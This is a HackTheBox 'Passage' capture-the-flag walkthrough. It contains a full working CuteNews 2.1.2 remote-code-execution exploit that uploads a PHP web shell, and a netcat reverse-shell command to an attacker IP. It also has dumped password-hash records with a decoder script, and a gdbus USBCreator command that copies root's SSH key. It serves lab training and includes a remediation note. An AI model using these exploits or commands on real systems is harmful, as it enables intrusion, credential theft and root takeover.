HackTheBox “Passage” Walkthrough
Passage is a medium-difficulty Linux machine on HackTheBox. It runs a CuteNews web application vulnerable to remote command execution, which gives initial access as www-data. Cracking the CuteNews password hash of the user paul, combined with password reuse, gets us a shell as the paul system user. An SSH key found in paul's home directory is also accepted for the user nadav, a member of the sudo group. LinPEAS output reveals an edited com.ubuntu.USBCreator.conf D-Bus policy that grants sudo group members access to the usb-creator service methods; abusing the USBCreator D-Bus service bypasses sudo's password policy and lets us read (or overwrite) arbitrary files as root.

Let’s get started! 🚀
Recon & Enumeration
Let's run a full nmap port and service scan:

Check port 80.

The site runs CuteNews, a PHP news management system. Browsing around, we find the CuteNews CMS login page at http://10.10.10.206/CuteNews.

The installed version is CuteNews 2.1.2; let's check searchsploit for it.

Exploit-DB entry 48800 is a remote code execution exploit for this version. Let's look at the details.
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m 48800
  Exploit: CuteNews 2.1.2 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/48800
     Path: /usr/share/exploitdb/exploits/php/webapps/48800.py
    Codes: CVE-2019-11447
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/48800.py

┌──(kali㉿kali)-[~/Desktop]
└─$ cat 48800.py
# Exploit Title: CuteNews 2.1.2 - Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3
import requests
from base64 import b64decode
import io
import re
import string
import random
import sys

# Raw string so the backslashes in the ASCII art are not treated as escapes
banner = r"""
_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
\___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ \/ ___/ __/
/ , _/ /__/ _/
/_/|_|\___/___/
"""
print(banner)
print("[->] Usage python3 exploit.py")
print()

sess = requests.session()
# Web shell payload: a GIF header to pass the image check, followed by PHP that runs the cmd parameter
payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"
ip = input("Enter the URL> ")


def extract_credentials():
    # cdata/users/lines is fetchable without authentication; every line except the
    # PHP guard is a base64-encoded, PHP-serialized user record holding a SHA-256 hash
    global sess, ip
    url = f"{ip}/CuteNews/cdata/users/lines"
    encoded_creds = sess.get(url).text
    buff = io.StringIO(encoded_creds)
    chash = buff.readlines()
    if "Not Found" in encoded_creds:
        print("[-] No hashes were found skipping!!!")
        return
    else:
        for line in chash:
            if "<?php die('Direct call - access denied'); ?>" not in line:
                credentials = b64decode(line)
                try:
                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)
                    print(sha_hash)
                except:
                    pass


def register():
    # Self-registration is open: create a throwaway account with a random username/password
    global sess, ip
    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(10))
    postdata = {
        "action": "register",
        "regusername": userpass,
        "regnickname": userpass,
        "regpassword": userpass,
        "confirm": userpass,
        "regemail": f"{userpass}@hack.me"
    }
    register = sess.post(f"{ip}/CuteNews/index.php?register", data=postdata, allow_redirects=False)
    if 302 == register.status_code:
        print(f"[+] Registration successful with username: {userpass} and password: {userpass}")
    else:
        sys.exit()


def send_payload(payload):
    # The profile form carries per-session signature fields that have to be echoed back
    global ip
    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text
    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)
    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)
    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)
    print(f"signature_key: {signature_key}")
    print(f"signature_dsi: {signature_dsi}")
    print(f"logged in user: {logged_user}")
    # Upload the PHP payload as the avatar; the file extension is not validated
    files = {
        "mod": (None, "main"),
        "opt": (None, "personal"),
        "__signature_key": (None, f"{signature_key}"),
        "__signature_dsi": (None, f"{signature_dsi}"),
        "editpassword": (None, ""),
        "confirmpassword": (None, ""),
        "editnickname": (None, logged_user),
        "avatar_file": (f"{logged_user}.php", payload),
        "more[site]": (None, ""),
        "more[about]": (None, "")
    }
    payload_send = sess.post(f"{ip}/CuteNews/index.php", files=files).text
    print("============================\nDropping to a SHELL\n============================")
    while True:
        print()
        command = input("command > ")
        postdata = {"cmd": command}
        # The avatar is stored under uploads/ as avatar_<user>_<user>.php
        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)
        if 404 == output.status_code:
            print("sorry i can't find your webshell try running the exploit again")
            sys.exit()
        else:
            output = re.sub("GIF8;", "", output.text)
            print(output.strip())


if __name__ == "__main__":
    print("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")
    extract_credentials()
    print("================================================================")
    print()
    print("=============================\nRegistering a users\n=============================")
    register()
    print()
    print("=======================================================\nSending Payload\n=======================================================")
    send_payload(payload)
    print()
The script exploits CVE-2019-11447 in CuteNews 2.1.2. It first tries to pull the stored SHA-256 password hashes from /CuteNews/cdata/users/lines, which the application serves without authentication. It then registers a throwaway user with random credentials and uploads a PHP web shell as that user's avatar: the upload is prefixed with a GIF header to satisfy the image check, but the .php extension is never rejected, so the file lands at /CuteNews/uploads/avatar_<user>_<user>.php. Every command typed at the prompt is then sent as the cmd parameter and executed by system() on the server.
To run the exploit, enter the base URL of the vulnerable host when prompted (here http://10.10.10.206, without the /CuteNews path, which the script appends itself).

Start a netcat listener on the attack box to catch a reverse shell, which is easier to upgrade than the web shell:

Run a reverse shell command: nc -e /bin/sh 10.10.14.6 4343

Checking our listener.

Upgrade to a TTY shell and start exploring the CMS directory.

We locate the cdata folder and, inside it, a users subfolder.

In the users folder, we dump the PHP files.
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
05.php 21.php 52.php 6e.php 95.php c8.php f8.php
09.php 30.php 5d.php 77.php 97.php d4.php fc.php
0a.php 32.php 66.php 7a.php b0.php d5.php lines
16.php 4c.php 6a.php 8f.php bb.php d6.php users.txt
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat *.php
cat *.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTcwMDMxNzUyNztzOjEwOiJ2TWFYZldRa1prIjt9fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=<?php die('Direct call - access denied'); ?>
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6IkhsRWJHaXVFRmxAaGFjay5tZSI7czoxMDoiSGxFYkdpdUVGbCI7fXM6MjoiaWQiO2E6MTp7aToxNzAwMzI4OTg5O3M6MTA6IkIzcmlWOE1SdXYiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODkxMDg5NjtzOjY6ImhhY2tlciI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==<?php die('Direct call - access denied'); ?>
YToyOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoiSGxFYkdpdUVGbCI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNzAwMzI3NjM0IjtzOjQ6Im5hbWUiO3M6MTA6IkhsRWJHaXVFRmwiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTg6IkhsRWJHaXVFRmxAaGFjay5tZSI7czo0OiJuaWNrIjtzOjEwOiJIbEViR2l1RUZsIjtzOjQ6InBhc3MiO3M6NjQ6IjdmZWZjZmEzOTk5OTRkNzU2ZWY0NjVmNDYxNmI3YmJhOTNlYjliNmM0YzgzZDEzZDljODQyMDQ1MTkxOWYzMTAiO3M6NDoibW9yZSI7czo2MDoiWVRveU9udHpPalE2SW5OcGRHVWlPM002TURvaUlqdHpPalU2SW1GaWIzVjBJanR6T2pBNklpSTdmUT09IjtzOjY6ImF2YXRhciI7czozMjoiYXZhdGFyX0hsRWJHaXVFRmxfSGxFYkdpdUVGbC5waHAiO3M6NjoiZS1oaWRlIjtzOjA6IiI7fX1zOjU6ImVtYWlsIjthOjE6e3M6MTg6IkIzcmlWOE1SdXZAaGFjay5tZSI7czoxMDoiQjNyaVY4TVJ1diI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTg6InZNYVhmV1FrWmtAaGFjay5tZSI7czoxMDoidk1hWGZXUWtaayI7fX0=<?php die('Direct call - access denied'); ?>
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
<?php die('Direct call - access denied'); ?>
YToxOntzOjI6ImlkIjthOjE6e2k6MTcwMDMyNzYzNDtzOjEwOiJIbEViR2l1RUZsIjt9fQ==<?php die('Direct call - access denied'); ?>
Each file is a single base64 line behind a PHP guard; the files have no trailing newline, which is why the guard of the next file runs straight into the preceding base64 in the cat output. We decode the base64 content.

The decoded data is PHP-serialized arrays. The "id" and "email" entries are only lookup indexes, while the "name" entries hold the full profile of a user, including a 64-hex-character (SHA-256) password hash. The admin record's e-mail address, nadav@passage.htb, also names a second user of interest. The record for paul-coles (paul@passage.htb) carries the hash:
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
CuteNews stores a plain, unsalted SHA-256 of the password, so a precomputed lookup stands a good chance. Let's submit this hash to crackstation.net.
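As an added example (not code from the original post or from CuteNews), the following Python does the decoding shown above offline: it splits a dump on the PHP guard string, base64-decodes each chunk, walks the PHP serialize() format to recover the arrays, and pulls out username, e-mail, ACL level and SHA-256 hash for every profile record. It also checks a candidate password against a hash locally, since CuteNews uses an unsalted SHA-256. The two records embedded below are paul-coles's index and profile entries copied from the listing above; the minimal unserializer handles only the types these files use (strings, integers, booleans, null and arrays).

```python
"""Decode CuteNews 2.1.2 user records (cdata/users/*.php) and extract password hashes.

Added example for this walkthrough; not part of the original post or of CuteNews.
"""
import base64
import hashlib

GUARD = b"<?php die('Direct call - access denied'); ?>"

# Two records copied from the cat *.php output above, concatenated exactly as the
# files sit on disk: guard + newline + one base64 line, with no trailing newline.
SAMPLE_DUMP = (
    GUARD + b"\n"
    + b"YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ=="
    + GUARD + b"\n"
    + b"YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19"
)


def php_unserialize(data: bytes, pos: int = 0):
    """Parse one PHP-serialized value starting at `pos`; return (value, next_pos).

    Covers i:, s:, b:, N; and a: (arrays become dicts; PHP string lengths are
    byte counts, so strings are sliced as bytes before decoding).
    """
    tag = data[pos:pos + 1]
    if tag == b"i":                                  # i:123;
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == b"b":                                  # b:1;
        end = data.index(b";", pos)
        return data[pos + 2:end] == b"1", end + 1
    if tag == b"N":                                  # N;
        return None, pos + 2
    if tag == b"s":                                  # s:LEN:"bytes";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                            # skip :"
        value = data[start:start + length]
        return value.decode("utf-8", "replace"), start + length + 2   # skip ";
    if tag == b"a":                                  # a:COUNT:{key;value;...}
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                              # skip :{
        result = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            value, pos = php_unserialize(data, pos)
            result[key] = value
        return result, pos + 1                       # skip }
    raise ValueError(f"unsupported PHP type {tag!r} at offset {pos}")


def decode_records(raw: bytes):
    """Split a dump on the PHP guard, base64-decode each chunk and unserialize it."""
    records = []
    for chunk in raw.split(GUARD):
        chunk = chunk.strip()
        if chunk:
            value, _ = php_unserialize(base64.b64decode(chunk))
            records.append(value)
    return records


def extract_hashes(records):
    """Map username -> (email, acl, sha256) from the 'name'-keyed profile records.

    'id'- and 'email'-keyed records are just indexes and carry no hash.
    """
    found = {}
    for rec in records:
        if not isinstance(rec, dict):
            continue
        for username, profile in rec.get("name", {}).items():
            if isinstance(profile, dict) and "pass" in profile:
                found[username] = (profile.get("email"), profile.get("acl"), profile["pass"])
    return found


def check_candidate(stored_hash: str, candidate: str) -> bool:
    """CuteNews 2.1.2 stores an unsalted SHA-256, so candidates verify offline."""
    return hashlib.sha256(candidate.encode()).hexdigest() == stored_hash


if __name__ == "__main__":
    for user, (email, acl, digest) in extract_hashes(decode_records(SAMPLE_DUMP)).items():
        print(f"{user}\t{email}\tacl={acl}\t{digest}")
```

Feed it the concatenation of all the *.php files (or the cdata/users/lines file the exploit script fetches) to list every account; the acl field tells you which ones are administrators.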

Switch to the paul user with the cracked password (su paul); the CuteNews password is reused for the system account.

While navigating into the .ssh directory, we locate the id_rsa and id_rsa.pub files.

Let's have a look at the key files.

We transfer the id_rsa to our attack box.

The same private key is accepted for the user nadav, so we SSH in to the target as nadav.

After logging in over SSH, we move to /tmp, transfer the LinPEAS script and run it.

LinPEAS reports that the machine is vulnerable to the USBCreator D-Bus privilege escalation.

We look up the issue to see how it can be used to elevate privileges on the target.

The usb-creator helper runs as root and exposes its methods over the system D-Bus. On this box the bus policy lets members of the sudo group send messages to it, so such a user can call the service without going through sudo at all, bypassing sudo's password prompt. The Image method copies an arbitrary source path to an arbitrary destination with root privileges and no further authorization check, which makes it a root-level arbitrary file read (and overwrite). Using gdbus, we have USBCreator copy the root user's private SSH key to a file in /tmp.
Exploit command (the arguments are the source path, the destination path and the allow-unsafe flag):
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/id_root true
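As an added example (not from the original post or from usb-creator), the following Python audits a D-Bus system-bus policy for the grant LinPEAS flagged and builds the gdbus call shown above. SAMPLE_CONF is a constructed stand-in for /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf: a stock root-only policy plus the extra group="sudo" block this walkthrough describes, so the real file may differ in detail. The gdbus argument list is the one from the command above; copy_as_root only does anything on the target host itself.

```python
"""Audit a D-Bus bus policy for over-broad access to com.ubuntu.USBCreator and
build the Image call that abuses it.

Added example for this walkthrough; not code from the original post or usb-creator.
"""
import shlex
import subprocess
import xml.etree.ElementTree as ET

SERVICE = "com.ubuntu.USBCreator"
OBJECT_PATH = "/com/ubuntu/USBCreator"
INTERFACE = "com.ubuntu.USBCreator"

# Constructed policy fragments: a root-only stock policy, the sudo-group grant
# described in the walkthrough, and a default block that denies everyone else.
STOCK_HEAD = """<busconfig>
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator"/>
  </policy>
"""
SUDO_GRANT = """  <policy group="sudo">
    <allow send_destination="com.ubuntu.USBCreator"/>
  </policy>
"""
STOCK_TAIL = """  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <deny send_destination="com.ubuntu.USBCreator"/>
  </policy>
</busconfig>
"""
SAMPLE_CONF = STOCK_HEAD + SUDO_GRANT + STOCK_TAIL   # what we assume the box had
HARDENED_CONF = STOCK_HEAD + STOCK_TAIL              # the same file with the grant removed


def principal(policy) -> str:
    """Name the caller a <policy> element applies to (user, group or context)."""
    for attr in ("user", "group", "context", "at_console"):
        if policy.get(attr) is not None:
            return f"{attr}={policy.get(attr)}"
    return "context=default"


def unrestricted_senders(conf_xml: str, destination: str = SERVICE):
    """Principals allowed to call any method on `destination`.

    dbus-daemon evaluates the rules inside a <policy> in order and the last
    match wins, so an <allow> followed by a blanket <deny> for the same
    destination is not a grant. Rules scoped with send_interface open a single
    interface only and are ignored here; a full-destination <allow> that is
    still in force at the end of its block is reported.
    """
    exposed = []
    for policy in ET.fromstring(conf_xml).iter("policy"):
        allowed = False
        for rule in policy:
            if rule.get("send_destination") != destination or rule.get("send_interface"):
                continue
            allowed = rule.tag == "allow"
        if allowed:
            exposed.append(principal(policy))
    return exposed


def non_root_senders(conf_xml: str):
    """The finding an auditor cares about: anyone other than root with full access."""
    return [p for p in unrestricted_senders(conf_xml) if p != "user=root"]


def image_call_argv(source: str, target: str, allow_unsafe: bool = True):
    """The gdbus invocation from the walkthrough. The helper copies `source` to
    `target` as root; no sudo password is involved because the bus policy, not
    sudo, decides who may talk to it."""
    return ["gdbus", "call", "--system", "--dest", SERVICE, "--object-path", OBJECT_PATH,
            "--method", f"{INTERFACE}.Image", source, target,
            "true" if allow_unsafe else "false"]


def copy_as_root(source: str, target: str) -> subprocess.CompletedProcess:
    """Run the call on the target host (needs gdbus and membership in an allowed group)."""
    return subprocess.run(image_call_argv(source, target), capture_output=True, text=True)


if __name__ == "__main__":
    print("non-root principals with full access:", non_root_senders(SAMPLE_CONF))
    print("after removing the grant:", non_root_senders(HARDENED_CONF))
    print("abuse:", shlex.join(image_call_argv("/root/.ssh/id_rsa", "/tmp/id_root")))
```

The same audit, pointed at every file in /etc/dbus-1/system.d/, is a quick way to spot other root-running helpers handed to a group; the fix is simply to drop the extra <policy group="sudo"> block so only root may call the service.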

The copied key lets us SSH in as root directly from the target machine (ssh -i /tmp/id_root root@localhost).
